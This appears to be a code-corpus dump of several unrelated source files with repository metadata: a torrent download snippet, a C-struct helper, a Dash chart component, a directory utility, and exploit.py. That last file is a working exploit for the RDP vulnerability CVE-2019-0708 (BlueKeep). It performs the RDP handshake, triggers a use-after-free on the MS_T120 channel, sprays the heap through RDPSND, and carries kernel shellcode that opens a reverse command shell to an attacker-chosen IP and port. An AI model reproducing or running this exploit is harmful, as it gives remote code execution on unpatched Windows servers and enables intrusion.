print("If the cell is running for a long time check if the torrent has no seeders!")
os.system(f"transmission-cli -w '{loc}' {tor}")
print("DONE")
init()
download(FolderPath,TorrPath) | 25.37931 | 86 | 0.71875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 470 | 0.638587 |
7b5b098de65214be758959ec7c9a6aae3055a94c | 3,197 | py | Python | src/py21cmmc/_21cmfast/_utils.py | BradGreig/Hybrid21CMMC | 984aa88ee4543db24095a3ba8529e1f4d0b1048d | [
"MIT"
]
| null | null | null | src/py21cmmc/_21cmfast/_utils.py | BradGreig/Hybrid21CMMC | 984aa88ee4543db24095a3ba8529e1f4d0b1048d | [
"MIT"
]
| null | null | null | src/py21cmmc/_21cmfast/_utils.py | BradGreig/Hybrid21CMMC | 984aa88ee4543db24095a3ba8529e1f4d0b1048d | [
"MIT"
]
| null | null | null | """
Utilities that help with wrapping various C structures.
"""
class StructWithDefaults:
"""
A class which provides a convenient interface to create a C structure with defaults specified.
It is provided for the purpose of *creating* C structures in Python to be passed to C functions, where sensible
defaults are available. Structures which are created within C and passed back do not need to be wrapped.
This provides a *fully initialised* structure, and will fail if not all fields are specified with defaults.
.. note:: The actual C structure is gotten by calling an instance. This is auto-generated when called, based on the
parameters in the class.
.. warning:: This class will *not* deal well with parameters of the struct which are pointers. All parameters
should be primitive types, except for strings, which are dealt with specially.
Parameters
----------
ffi : cffi object
The ffi object from any cffi-wrapped library.
"""
_name = None
_defaults_ = {}
ffi = None
def __init__(self, **kwargs):
for k, v in self._defaults_.items():
# Prefer arguments given to the constructor.
if k in kwargs:
v = kwargs[k]
try:
setattr(self, k, v)
except AttributeError:
# The attribute has been defined as a property, save it as a hidden variable
setattr(self, "_" + k, v)
self._logic()
# Set the name of this struct in the C code
if self._name is None:
self._name = self.__class__.__name__
# A little list to hold references to strings so they don't de-reference
self._strings = []
def _logic(self):
pass
def new(self):
"""
Return a new empty C structure corresponding to this class.
"""
obj = self.ffi.new("struct " + self._name + "*")
return obj
def __call__(self):
"""
Return a filled C Structure corresponding to this instance.
"""
obj = self.new()
self._logic() # call this here to make sure any changes by the user to the arguments are re-processed.
for fld in self.ffi.typeof(obj[0]).fields:
key = fld[0]
val = getattr(self, key)
# Find the value of this key in the current class
if isinstance(val, str):
# If it is a string, need to convert it to C string ourselves.
val = self.ffi.new('char[]', getattr(self, key).encode())
try:
setattr(obj, key, val)
except TypeError:
print("For key %s, value %s:" % (key, val))
raise
self._cstruct = obj
return obj
@property
def pystruct(self):
"A Python dictionary containing every field which needs to be initialized in the C struct."
obj = self.new()
return {fld[0]:getattr(self, fld[0]) for fld in self.ffi.typeof(obj[0]).fields}
def __getstate__(self):
return {k:v for k,v in self.__dict__.items() if k not in ["_strings", "_cstruct"]} | 32.622449 | 119 | 0.597435 | 3,131 | 0.979356 | 0 | 0 | 246 | 0.076947 | 0 | 0 | 1,747 | 0.54645 |
7b5b0c3580d4b9ad4e0f4e13f5794c9e38d7df6a | 160 | py | Python | components/charts.py | tufts-ml/c19-dashboard | be88f91ca74dd154566bd7b36fe482565331346b | [
"MIT"
]
| null | null | null | components/charts.py | tufts-ml/c19-dashboard | be88f91ca74dd154566bd7b36fe482565331346b | [
"MIT"
]
| 5 | 2020-04-10T20:36:18.000Z | 2020-04-28T19:42:15.000Z | components/charts.py | tufts-ml/c19-dashboard | be88f91ca74dd154566bd7b36fe482565331346b | [
"MIT"
]
| null | null | null | import dash_html_components as html
def chart_panel() -> html.Div:
return html.Div(className='row', children=[html.Div(id='output', className='column')])
| 26.666667 | 90 | 0.725 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 21 | 0.13125 |
7b5bf002a4841de751ef7a81520f03f1fc8e3906 | 2,144 | py | Python | lib/bes/fs/dir_util.py | reconstruir/bes | 82ff54b2dadcaef6849d7de424787f1dedace85c | [
"Apache-2.0"
]
| null | null | null | lib/bes/fs/dir_util.py | reconstruir/bes | 82ff54b2dadcaef6849d7de424787f1dedace85c | [
"Apache-2.0"
]
| null | null | null | lib/bes/fs/dir_util.py | reconstruir/bes | 82ff54b2dadcaef6849d7de424787f1dedace85c | [
"Apache-2.0"
]
| null | null | null | #-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-
import os, os.path as path, shutil
import datetime
from .file_match import file_match
from .file_util import file_util
class dir_util(object):
@classmethod
def is_empty(clazz, d):
return clazz.list(d) == []
@classmethod
def list(clazz, d, relative = False, patterns = None):
'Return a list of a d contents. Returns absolute paths unless relative is True.'
result = sorted(os.listdir(d))
if not relative:
result = [ path.join(d, f) for f in result ]
if patterns:
result = file_match.match_fnmatch(result, patterns, file_match.ANY)
return result
@classmethod
def list_dirs(clazz, d):
'Like list() but only returns dirs.'
return [ f for f in clazz.list(d, full_path = True) if path.isdir(f) ]
@classmethod
def empty_dirs(clazz, d):
return [ f for f in clazz.list_dirs(d) if clazz.is_empty(f) ]
@classmethod
def all_parents(clazz, d):
result = []
while True:
parent = path.dirname(d)
result.append(parent)
if parent == '/':
break
d = parent
return sorted(result)
@classmethod
def older_dirs(clazz, dirs, days = 0, seconds = 0, microseconds = 0,
milliseconds = 0, minutes = 0, hours = 0, weeks = 0):
delta = datetime.timedelta(days = days,
seconds = seconds,
microseconds = microseconds,
milliseconds = milliseconds,
minutes = minutes,
hours = hours,
weeks = weeks)
now = datetime.datetime.now()
ago = now - delta
result = []
for d in dirs:
mtime = datetime.datetime.fromtimestamp(os.stat(d).st_mtime)
if mtime <= ago:
result.append(d)
return result
@classmethod
def remove(clazz, d):
if path.isfile(d):
raise ValueError('Not a directory: "{}"'.format(d))
if not path.exists(d):
raise ValueError('Directory does not exits: "{}"'.format(d))
os.rmdir(d)
| 30.197183 | 90 | 0.588619 | 1,930 | 0.900187 | 0 | 0 | 1,875 | 0.874534 | 0 | 0 | 265 | 0.123601 |
7b5cbfeebbb6c1b6c874a7c85487913e09de67c0 | 24,540 | py | Python | exploit.py | yassineaboukir/CVE-2019-0708 | 4f4ff5a9eef5ed4cda92376b25667fd5272d9753 | [
"Apache-2.0"
]
| null | null | null | exploit.py | yassineaboukir/CVE-2019-0708 | 4f4ff5a9eef5ed4cda92376b25667fd5272d9753 | [
"Apache-2.0"
]
| null | null | null | exploit.py | yassineaboukir/CVE-2019-0708 | 4f4ff5a9eef5ed4cda92376b25667fd5272d9753 | [
"Apache-2.0"
]
| null | null | null | import os
import argparse
from struct import pack
from twisted.internet import reactor
from twisted.application.reactors import Reactor
from twisted.internet.endpoints import HostnameEndpoint
from twisted.internet.protocol import ClientFactory
from pyrdp.core.ssl import ClientTLSContext
from pyrdp.mitm.layerset import RDPLayerSet
from pyrdp.mitm.state import RDPMITMState
from pyrdp.mitm.config import MITMConfig
from pyrdp.layer import LayerChainItem, VirtualChannelLayer, DeviceRedirectionLayer, ClipboardLayer
from pyrdp.pdu import MCSAttachUserConfirmPDU, MCSAttachUserRequestPDU, MCSChannelJoinConfirmPDU, \
MCSChannelJoinRequestPDU, MCSConnectInitialPDU, MCSConnectResponsePDU, MCSDisconnectProviderUltimatumPDU, \
MCSDomainParams, MCSErectDomainRequestPDU, MCSSendDataIndicationPDU, MCSSendDataRequestPDU, \
ClientChannelDefinition, PDU, ClientExtraInfo, ClientInfoPDU, DemandActivePDU, MCSSendDataIndicationPDU, \
ShareControlHeader, ConfirmActivePDU, SynchronizePDU, ShareDataHeader, ControlPDU, DeviceRedirectionPDU, \
DeviceListAnnounceRequest, X224DataPDU, NegotiationRequestPDU, NegotiationResponsePDU, X224ConnectionConfirmPDU, \
X224ConnectionRequestPDU, X224DisconnectRequestPDU, X224ErrorPDU, NegotiationFailurePDU, MCSDomainParams, \
ClientDataPDU, GCCConferenceCreateRequestPDU, SlowPathPDU, SetErrorInfoPDU, DeviceRedirectionClientCapabilitiesPDU
from pyrdp.enum import NegotiationFailureCode, NegotiationProtocols, EncryptionMethod, ChannelOption, MCSChannelName, \
ParserMode, SegmentationPDUType, ClientInfoFlags, CapabilityType, VirtualChannelCompressionFlag, SlowPathPDUType, \
SlowPathDataType, DeviceRedirectionPacketID, DeviceRedirectionComponent, VirtualChannelPDUFlag
from pyrdp.pdu.rdp.negotiation import NegotiationRequestPDU
from pyrdp.pdu.rdp.capability import Capability
from pyrdp.parser import NegotiationRequestParser, NegotiationResponseParser, ClientConnectionParser, GCCParser, \
ServerConnectionParser
from pyrdp.mcs import MCSClientChannel
from pyrdp.logging import LOGGER_NAMES, SessionLogger
import logging
# Hard-coded constant
PAYLOAD_HEAD_ADDR = 0xfffffa8008711010 + 0x38
class Exploit(ClientFactory):
def __init__(self, _reactor: Reactor, host: str, port: int, ip: str, bport: int):
self.reactor = _reactor
self.host = host
self.port = port
self.ip = ip
self.bport = bport
self.server = RDPLayerSet()
self.server.tcp.createObserver(onConnection = self.sendConnectionRequest)
self.server.x224.createObserver(onConnectionConfirm = self.onConnectionConfirm)
self.server.mcs.createObserver(
onConnectResponse = self.onConnectResponse,
onAttachUserConfirm = self.onAttachUserConfirm,
onChannelJoinConfirm = self.onChannelJoinConfirm,
onSendDataIndication = self.onSendDataIndication
)
self.server.slowPath.createObserver(
onDemandActive = self.onDemandActive,
onData = self.onSlowPathPDUReceived
)
logger = logging.getLogger(LOGGER_NAMES.MITM_CONNECTIONS)
log = SessionLogger(logger, "replay")
config = MITMConfig()
self.state = RDPMITMState(config, log.sessionID)
self.extra_channels = []
self.name_to_id = {}
self.virt_layer = {}
def appendChannel(self, name, flag):
self.extra_channels.append(
ClientChannelDefinition(name, flag)
)
def linkChannelIDWithName(self, channelID, name):
self.state.channelMap[channelID] = name
self.name_to_id[name] = channelID
def sendConnectionRequest(self):
print('Connected to RDP server')
print('Sending X224ConnectionRequestPDU...')
proto = NegotiationProtocols.SSL # | NegotiationProtocols.CRED_SSP
request = NegotiationRequestPDU(None, 0, proto)
parser = NegotiationRequestParser()
payload = parser.write(request)
self.server.x224.sendConnectionRequest(payload)
def onConnectionConfirm(self, pdu: X224ConnectionConfirmPDU):
print('Connection confirmed')
print('Sending MCSConnectInitialPDU...')
parser = NegotiationResponseParser()
response = parser.parse(pdu.payload)
if isinstance(response, NegotiationFailurePDU):
print('The negotiation failed: {}'.format(str(NegotiationFailureCode.getMessage(response.failureCode))))
os.exit(0)
print('The server selected {}'.format(response.selectedProtocols))
self.state.useTLS = response.tlsSelected
if self.state.useTLS:
self.startTLS()
gcc_parser = GCCParser()
client_parser = ClientConnectionParser()
client_data_pdu = ClientDataPDU.generate(
serverSelectedProtocol=response.selectedProtocols,
encryptionMethods=EncryptionMethod.ENCRYPTION_40BIT
)
# Define channels, which include MS_T120 of course
client_data_pdu.networkData.channelDefinitions += self.extra_channels
self.state.channelDefinitions = client_data_pdu.networkData.channelDefinitions
gcc_pdu = GCCConferenceCreateRequestPDU("1", client_parser.write(client_data_pdu))
# FIXME: pyrdp has a typo in this function
max_params = MCSDomainParams.createMaximum()
max_params.maxUserIDs = 65535
mcs_pdu = MCSConnectInitialPDU(
callingDomain=b'\x01',
calledDomain=b'\x01',
upward=1,
targetParams=MCSDomainParams.createTarget(34, 2),
minParams=MCSDomainParams.createMinimum(),
maxParams=max_params,
payload=gcc_parser.write(gcc_pdu)
)
self.server.mcs.sendPDU(mcs_pdu)
def onConnectResponse(self, pdu: MCSConnectResponsePDU):
print('Got MCSConnectionResponsePDU')
gcc_parser = GCCParser()
server_parser = ServerConnectionParser()
gcc_pdu = gcc_parser.parse(pdu.payload)
server_data = server_parser.parse(gcc_pdu.payload)
print('The server selected {}'.format(str(server_data.securityData.encryptionMethod)))
self.state.securitySettings.setEncryptionMethod(server_data.securityData.encryptionMethod)
self.state.securitySettings.setServerRandom(server_data.securityData.serverRandom)
if server_data.securityData.serverCertificate:
self.state.securitySettings.setServerPublicKey(server_data.securityData.serverCertificate.publicKey)
for index in range(len(server_data.networkData.channels)):
channelID = server_data.networkData.channels[index]
name = self.state.channelDefinitions[index].name
print('{} <---> Channel {}'.format(name, channelID))
self.linkChannelIDWithName(channelID, name)
self.io_channelID = server_data.networkData.mcsChannelID
self.linkChannelIDWithName(self.io_channelID, MCSChannelName.IO)
print('Sending MCSErectDomainRequestPDU...')
erect_pdu = MCSErectDomainRequestPDU(1, 1, b'')
self.server.mcs.sendPDU(erect_pdu)
print('Sending MCSAttachUserRequestPDU...')
attach_pdu = MCSAttachUserRequestPDU()
self.server.mcs.sendPDU(attach_pdu)
# Issue one ChannelJoinRequest
# If all the requests are consumed, then send SecurityExchangePDU and ClientInfoPDU
def consumeChannelJoinRequestOrFinish(self):
if self.channel_join_req_queue:
channelID = self.channel_join_req_queue.pop()
name = self.state.channelMap[channelID]
print('Attempting to join {}...'.format(name))
join_pdu = MCSChannelJoinRequestPDU(self.initiator, channelID, b'')
self.server.mcs.sendPDU(join_pdu)
else :
self.sendSecurityExchangePDU()
self.sendClientInfoPDU()
def onAttachUserConfirm(self, pdu: MCSAttachUserConfirmPDU):
print('Got MCSAttachUserConfirmPDU')
self.initiator = pdu.initiator
print('User Channel ID: {}'.format(self.initiator))
self.linkChannelIDWithName(self.initiator, 'User')
self.channels = {}
self.channel_join_req_queue = list(self.state.channelMap.keys())
self.consumeChannelJoinRequestOrFinish()
def onChannelJoinConfirm(self, pdu: MCSChannelJoinConfirmPDU):
if pdu.result != 0:
print('ChannelJoinRequest failed.')
os.exit(0)
print('Joined {}'.format(self.state.channelMap[pdu.channelID]))
channel = MCSClientChannel(self.server.mcs, self.initiator, pdu.channelID)
self.channels[pdu.channelID] = channel
self.setupChannel(channel)
self.consumeChannelJoinRequestOrFinish()
def setupChannel(self, channel):
userID = channel.userID
channelID = channel.channelID
name = self.state.channelMap[channelID]
if name == MCSChannelName.DEVICE_REDIRECTION:
self.setupDeviceChannel(channel)
elif name == MCSChannelName.CLIPBOARD:
self.setupClipboardChannel(channel)
elif name == MCSChannelName.IO:
self.setupIOChannel(channel)
else :
self.setupVirtualChannel(channel)
def setupDeviceChannel(self, device_channel):
security = self.state.createSecurityLayer(ParserMode.CLIENT, True)
virtual_channel = VirtualChannelLayer(activateShowProtocolFlag=False)
redirection_layer = DeviceRedirectionLayer()
redirection_layer.createObserver(onPDUReceived = self.onDeviceRedirectionPDUReceived)
LayerChainItem.chain(device_channel, security, virtual_channel, redirection_layer)
self.server.redirection_layer = redirection_layer
def setupClipboardChannel(self, clip_channel):
security = self.state.createSecurityLayer(ParserMode.CLIENT, True)
virtual_channel = VirtualChannelLayer()
clip_layer = ClipboardLayer()
clip_layer.createObserver(onPDUReceived = self.onPDUReceived)
LayerChainItem.chain(clip_channel, security, virtual_channel, clip_layer)
def setupIOChannel(self, io_channel):
self.server.security = self.state.createSecurityLayer(ParserMode.CLIENT, False)
self.server.fastPath = self.state.createFastPathLayer(ParserMode.CLIENT)
self.server.security.createObserver(onLicensingDataReceived = self.onLicensingDataReceived)
LayerChainItem.chain(io_channel, self.server.security, self.server.slowPath)
self.server.segmentation.attachLayer(SegmentationPDUType.FAST_PATH, self.server.fastPath)
def setupVirtualChannel(self, channel):
security = self.state.createSecurityLayer(ParserMode.CLIENT, True)
layer = VirtualChannelLayer(activateShowProtocolFlag=False)
layer.createObserver(onPDUReceived = self.onPDUReceived)
LayerChainItem.chain(channel, security, layer)
self.virt_layer[channel] = layer
def onSendDataIndication(self, pdu: MCSSendDataIndicationPDU):
if pdu.channelID in self.channels:
self.channels[pdu.channelID].recv(pdu.payload)
else :
print('Warning: channelID {} is not included in the maintained channels'.format(pdu.channelID))
def onLicensingDataReceived(self, data: bytes):
if self.state.useTLS:
self.server.security.securityHeaderExpected = False
def onSlowPathPDUReceived(self, pdu: SlowPathPDU):
if isinstance(pdu, SetErrorInfoPDU):
print(pdu)
def onPDUReceived(self, pdu: PDU):
print(pdu)
assert 0
def sendSecurityExchangePDU(self):
if self.state.securitySettings.encryptionMethod == EncryptionMethod.ENCRYPTION_NONE:
return # unnecessary
# FIXME: we don't support ENCRYPTION_40BIT yet
# because by default the server selects ENCRYPTION_NONE when TLS is specified
assert 0
def sendClientInfoPDU(self):
print('sending ClientInfoPDU...')
AF_INET = 0x2
extra_info = ClientExtraInfo(
AF_INET,
'example.com'.encode('utf-16le'),
'C:\\'.encode('utf-16le')
)
English_US = 1033
client_info_pdu = ClientInfoPDU(
English_US | (English_US << 16),
ClientInfoFlags.INFO_UNICODE,
'', '', '', '', '',
extra_info
)
self.server.security.sendClientInfo(client_info_pdu)
def onDemandActive(self, pdu: DemandActivePDU):
print('Got DemandActivePDU')
print('Sending ConfirmActivePDU...')
cap_sets = pdu.parsedCapabilitySets
if CapabilityType.CAPSTYPE_VIRTUALCHANNEL in cap_sets: # FIXME: we should compress data for efficient spraying
cap_sets[CapabilityType.CAPSTYPE_VIRTUALCHANNEL].flags = VirtualChannelCompressionFlag.VCCAPS_NO_COMPR
self.has_bitmapcache = False
if CapabilityType.CAPSTYPE_BITMAPCACHE in cap_sets:
cap_sets[CapabilityType.CAPSTYPE_BITMAPCACHE] = Capability(CapabilityType.CAPSTYPE_BITMAPCACHE, b"\x00" * 36)
self.has_bitmapcache = True
TS_PROTOCOL_VERSION = 0x1
header = ShareControlHeader(SlowPathPDUType.CONFIRM_ACTIVE_PDU, TS_PROTOCOL_VERSION, self.initiator)
server_channelID = 0x03EA
confirm_active_pdu = ConfirmActivePDU(header, pdu.shareID, server_channelID, pdu.sourceDescriptor, -1, cap_sets, None)
self.server.slowPath.sendPDU(confirm_active_pdu)
print('Sending SynchronizePDU...')
STREAM_LOW = 1
header = ShareDataHeader(
SlowPathPDUType.DATA_PDU,
TS_PROTOCOL_VERSION,
self.initiator,
pdu.shareID,
STREAM_LOW,
8,
SlowPathDataType.PDUTYPE2_SYNCHRONIZE,
0,
0
)
SYNCMSGTYPE_SYNC = 1
sync_pdu = SynchronizePDU(header, SYNCMSGTYPE_SYNC, server_channelID)
self.server.slowPath.sendPDU(sync_pdu)
print('Sending ControlPDU(Cooperate)...')
header = ShareDataHeader(
SlowPathPDUType.DATA_PDU,
TS_PROTOCOL_VERSION,
self.initiator,
pdu.shareID,
STREAM_LOW,
12,
SlowPathDataType.PDUTYPE2_CONTROL,
0,
0
)
CTRLACTION_COOPERATE = 4
control_pdu = ControlPDU(header, CTRLACTION_COOPERATE, 0, 0)
self.server.slowPath.sendPDU(control_pdu)
print('Sending ControlPDU(Request Control)...')
CTRLACTION_REQUEST_CONTROL = 1
control_pdu = ControlPDU(header, CTRLACTION_REQUEST_CONTROL, 0, 0)
self.server.slowPath.sendPDU(control_pdu)
if self.has_bitmapcache:
print('Sending PersistentKeyListPDU...')
header = ShareDataHeader(
SlowPathPDUType.DATA_PDU,
TS_PROTOCOL_VERSION,
self.initiator,
pdu.shareID,
STREAM_LOW,
0,
SlowPathDataType.PDUTYPE2_BITMAPCACHE_PERSISTENT_LIST,
0,
0
)
# This PDU is hard-coded because pyrdp doesn't support it...
payload = b'\x00' * 20 + b'\x03' + b'\x00' * 3
pers_pdu = SlowPathPDU(header, payload)
self.server.slowPath.sendPDU(pers_pdu)
print('Sending FontListPDU...')
header = ShareDataHeader(
SlowPathPDUType.DATA_PDU,
TS_PROTOCOL_VERSION,
self.initiator,
pdu.shareID,
STREAM_LOW,
0,
SlowPathDataType.PDUTYPE2_FONTLIST,
0,
0
)
# This PDU is also hard-coded...
payload = b'\x00' * 4 + b'\x03\x00' + b'\x32\x00'
font_pdu = SlowPathPDU(header, payload)
self.server.slowPath.sendPDU(font_pdu)
print('Completed handshake')
def writeDataIntoVirtualChannel(self, name, data: bytes, length=-1, flags=VirtualChannelPDUFlag.CHANNEL_FLAG_FIRST | VirtualChannelPDUFlag.CHANNEL_FLAG_LAST):
channelID = self.name_to_id[name]
channel = self.channels[channelID]
# Send VirtualChannelPDU(manually)
payload = b''
if length == -1:
length = len(data)
payload += pack('<I', length)
payload += pack('<I', flags)
payload += data
MAX_CHUNK_SIZE = 1600
assert len(payload) <= MAX_CHUNK_SIZE
# Since we send (possibly) a bit malformed pdu, we don't use virt_layer.sendBytes
self.virt_layer[channel].previous.sendBytes(payload)
def onDeviceRedirectionPDUReceived(self, pdu: DeviceRedirectionPDU):
if pdu.packetID == DeviceRedirectionPacketID.PAKID_CORE_SERVER_ANNOUNCE:
print('Server Announce Request came')
print('Sending Client Announce Reply...')
reply_pdu = DeviceRedirectionPDU(
DeviceRedirectionComponent.RDPDR_CTYP_CORE,
DeviceRedirectionPacketID.PAKID_CORE_CLIENTID_CONFIRM,
pdu.payload
)
self.server.redirection_layer.sendPDU(reply_pdu)
print('Sending Client Name Request...')
payload = b''
payload += pack('<I', 0)
payload += pack('<I', 0)
name = b'hoge\x00'
payload += pack('<I', len(name))
payload += name
client_name_pdu = DeviceRedirectionPDU(
DeviceRedirectionComponent.RDPDR_CTYP_CORE,
DeviceRedirectionPacketID.PAKID_CORE_CLIENT_NAME,
payload
)
self.server.redirection_layer.sendPDU(client_name_pdu)
elif pdu.packetID == DeviceRedirectionPacketID.PAKID_CORE_SERVER_CAPABILITY:
print('Server Core Capability Request came')
print('Sending Client Core Capability Response...')
resp_pdu = DeviceRedirectionClientCapabilitiesPDU(pdu.capabilities)
self.server.redirection_layer.sendPDU(resp_pdu)
elif pdu.packetID == DeviceRedirectionPacketID.PAKID_CORE_CLIENTID_CONFIRM:
print('Server Client ID Confirm came')
print('Sending Client Device List Announce Request...')
req_pdu = DeviceListAnnounceRequest([])
self.server.redirection_layer.sendPDU(req_pdu)
print('Completed Devicve FS Virtual Channel initialization')
self.runExploit()
else :
print(pdu)
def triggerUAF(self):
print('Trigger UAF')
payload = b"\x00\x00\x00\x00\x00\x00\x00\x00\x02"
payload += b'\x00' * 0x22
self.writeDataIntoVirtualChannel('MS_T120', payload)
def dereferenceVTable(self):
print('Dereference VTable')
RN_USER_REQUESTED = 0x3
dpu = MCSDisconnectProviderUltimatumPDU(RN_USER_REQUESTED)
self.server.mcs.sendPDU(dpu)
def runExploit(self):
# see shellcode.s
shellcode = b'\x49\xbd\x00\x0f\x00\x00\x80\xf7\xff\xff\x48\xbf\x00\x08\x00\x00\x80\xf7\xff\xff\x48\x8d\x35\x41\x01\x00\x00\xb9\xc1\x01\x00\x00\xf3\xa4\x65\x48\x8b\x3c\x25\x38\x00\x00\x00\x48\x8b\x7f\x04\x48\xc1\xef\x0c\x48\xc1\xe7\x0c\x48\x81\xef\x00\x10\x00\x00\x66\x81\x3f\x4d\x5a\x75\xf2\x41\xbf\x3e\x4c\xf8\xce\xe8\x52\x02\x00\x00\x8b\x40\x03\x83\xe8\x08\x41\x89\x45\x10\x41\xbf\x78\x7c\xf4\xdb\xe8\x21\x02\x00\x00\x48\x91\x41\xbf\x3f\x5f\x64\x77\xe8\x30\x02\x00\x00\x8b\x58\x03\x48\x8d\x53\x28\x41\x89\x55\x00\x65\x48\x8b\x2c\x25\x88\x01\x00\x00\x48\x8d\x14\x11\x48\x8b\x12\x48\x89\xd0\x48\x29\xe8\x48\x3d\x00\x05\x00\x00\x77\xef\x41\x89\x45\x08\x41\xbf\xe1\x14\x01\x17\xe8\xf8\x01\x00\x00\x8b\x50\x03\x83\xc2\x08\x48\x8d\x34\x19\xe8\xd4\x01\x00\x00\x3d\xd8\x83\xe0\x3e\x74\x09\x48\x8b\x0c\x11\x48\x29\xd1\xeb\xe7\x41\x8b\x6d\x00\x48\x01\xcd\x48\x89\xeb\x48\x8b\x6d\x08\x48\x39\xeb\x74\xf7\x48\x89\xea\x49\x2b\x55\x08\x41\x8b\x45\x10\x48\x01\xd0\x48\x83\x38\x00\x74\xe3\x49\x8d\x4d\x18\x4d\x31\xc0\x4c\x8d\x0d\x4c\x00\x00\x00\x41\x55\x6a\x01\x68\x00\x08\xfe\x7f\x41\x50\x48\x83\xec\x20\x41\xbf\xc4\x5c\x19\x6d\xe8\x6e\x01\x00\x00\x4d\x31\xc9\x48\x31\xd2\x49\x8d\x4d\x18\x41\xbf\x34\x46\xcc\xaf\xe8\x59\x01\x00\x00\x48\x83\xc4\x40\x85\xc0\x74\x9e\x49\x8b\x45\x28\x80\x78\x1a\x01\x74\x09\x48\x89\x00\x48\x89\x40\x08\xeb\x8b\xeb\xfe\x48\xb8\x00\xff\x3f\x00\x80\xf6\xff\xff\x80\x08\x02\x80\x60\x07\x7f\xc3\x65\x48\x8b\x3c\x25\x60\x00\x00\x00\x41\xbf\xe7\xdf\x59\x6e\xe8\x86\x01\x00\x00\x49\x94\x41\xbf\xa8\x6f\xcd\x4e\xe8\x79\x01\x00\x00\x49\x95\x41\xbf\x57\x05\x63\xcf\xe8\x6c\x01\x00\x00\x49\x96\x48\x81\xec\xa0\x02\x00\x00\x31\xf6\x31\xc0\x48\x8d\x7c\x24\x58\xb9\x60\x00\x00\x00\xf3\xaa\x48\x8d\x94\x24\xf0\x00\x00\x00\xb9\x02\x02\x00\x00\x41\xff\xd4\x6a\x02\x5f\x8d\x56\x01\x89\xf9\x4d\x31\xc9\x4d\x31\xc0\x89\x74\x24\x28\x89\x74\x24\x20\x41\xff\xd5\x48\x93\x66\x89\xbc\x24\xd8\x00\x00\x00\xc7\x84\x24\xdc\x00\x00\x00\xc0\xa8\x38\x01\x66\xc7\x84\x24\xda\x00\x00\x00\x11\x5c\x44\x8d\x46\x10\x48\x8d\x94\x24\xd8\x00\x00\x00\x48\x89\xd9\x41\xff\xd6\x48\x8d\x15\x7e\x00\x00\x00\x4d\x31\xc0\x4d\x31\xc9\x31\xc9\x48\x8d\x84\x24\xc0\x00\x00\x00\x48\x89\x44\x24\x48\x48\x8d\x44\x24\x50\x48\x89\x44\x24\x40\x48\x89\x74\x24\x38\x48\x89\x74\x24\x30\x89\x74\x24\x28\xc7\x44\x24\x20\x01\x00\x00\x00\x66\x89\xb4\x24\x90\x00\x00\x00\x48\x89\x9c\x24\xa0\x00\x00\x00\x48\x89\x9c\x24\xa8\x00\x00\x00\x48\x89\x9c\x24\xb0\x00\x00\x00\xc7\x44\x24\x50\x68\x00\x00\x00\xc7\x84\x24\x8c\x00\x00\x00\x01\x01\x00\x00\x65\x48\x8b\x3c\x25\x60\x00\x00\x00\x41\xbf\x9f\xb5\x90\xf3\xe8\x96\x00\x00\x00\xeb\xfe\x63\x6d\x64\x00\xe8\x17\x00\x00\x00\xff\xe0\x57\x48\x31\xff\x48\x31\xc0\xc1\xcf\x0d\xac\x01\xc7\x84\xc0\x75\xf6\x48\x97\x5f\xc3\x57\x56\x53\x51\x52\x55\x8b\x4f\x3c\x8b\xac\x0f\x88\x00\x00\x00\x48\x01\xfd\x8b\x4d\x18\x8b\x5d\x20\x48\x01\xfb\x67\xe3\x2b\x48\xff\xc9\x8b\x34\x8b\x48\x01\xfe\xe8\xbe\xff\xff\xff\x44\x39\xf8\x75\xea\x8b\x5d\x24\x48\x01\xfb\x66\x8b\x0c\x4b\x8b\x5d\x1c\x48\x01\xfb\x8b\x04\x8b\x48\x01\xf8\xeb\x03\x48\x31\xc0\x5d\x5a\x59\x5b\x5e\x5f\xc3\x57\x41\x56\x48\x8b\x7f\x18\x4c\x8b\x77\x20\x4d\x8b\x36\x49\x8b\x7e\x20\xe8\x95\xff\xff\xff\x48\x85\xc0\x74\xef\x41\x5e\x5f\xc3\xe8\xdb\xff\xff\xff\xff\xe0'
# FIXME: hard-coded ip address and port number
assert self.ip.count('.') == 3
dots = [int(v) for v in self.ip.split('.')]
val = 0
for i in range(4):
assert 0 <= dots[i] <= 255
val += dots[i] << (8*i)
tmp = shellcode[:0x1dd]
tmp += pack('<I', val)
tmp += shellcode[0x1e1:0x1e9]
tmp += pack('>H', self.bport)
tmp += shellcode[0x1eb:]
shellcode = tmp
for j in range(0x10000):
if j%0x400 == 0:
print(hex(j))
payload = b'' # PAYLOAD_HEAD_ADDR
payload += pack('<Q', PAYLOAD_HEAD_ADDR+8) # vtable
payload += shellcode
payload = payload.ljust(1580, b'X')
assert len(payload) == 1580
self.writeDataIntoVirtualChannel('RDPSND', payload)
self.triggerUAF()
for j in range(0x600):
if j%0x40 == 0:
print(hex(j))
payload = b''
# resource + 0x20
payload += pack('<Q', 0) # Shared
payload += pack('<Q', 0) # Exc
payload += pack('<Q', 0xdeadbeeffeedface)
payload += pack('<Q', 0xdeadbeeffeedface)
payload += pack('<I', 0x0)
payload += pack('<I', 0x0)
payload += pack('<I', 0x0) # NumShared
payload += pack('<I', 0x0)
payload += pack('<Q', 0x0)
payload += pack('<Q', 0xcafebabefeedfeed)
payload += pack('<Q', 0x0) # SpinL
# resource2
payload += pack('<Q', 0xcafebabefeedfeed)
payload += pack('<Q', 0xfeedfeed14451445)
payload += pack('<Q', 0)
payload += pack('<H', 0) # Active
payload += pack('<H', 0)
payload += pack('<I', 0)
payload += pack('<Q', 0) # Shared
payload += pack('<Q', 0) # Exc
payload += pack('<Q', 0xdeadbeeffeedface)
payload += pack('<Q', 0xdeadbeeffeedface)
payload += pack('<I', 0x0)
payload += pack('<I', 0x0)
payload += pack('<I', 0x0) # NumShared
payload += pack('<I', 0x0)
payload += pack('<Q', 0x0)
payload += pack('<Q', 0xcafebabefeedfeed)
payload += pack('<Q', 0x0) # SpinL
# remainder
payload += pack('<I', 0)
payload += pack('<I', 0)
payload += pack('<Q', 0x72)
payload += b'W' * 8
payload += pack('<Q', PAYLOAD_HEAD_ADDR) # vtable
payload += pack('<I', 0x5)
assert len(payload) == 0x10C - 0x38
payload += b'MS_T120\x00'
payload += pack('<I', 0x1f)
payload = payload.ljust(296, b'Z')
assert len(payload) == 296
self.writeDataIntoVirtualChannel('RDPSND', payload)
print('payload size: {}'.format(len(shellcode)))
self.dereferenceVTable()
def startTLS(self):
contextForServer = ClientTLSContext()
self.server.tcp.startTLS(contextForServer)
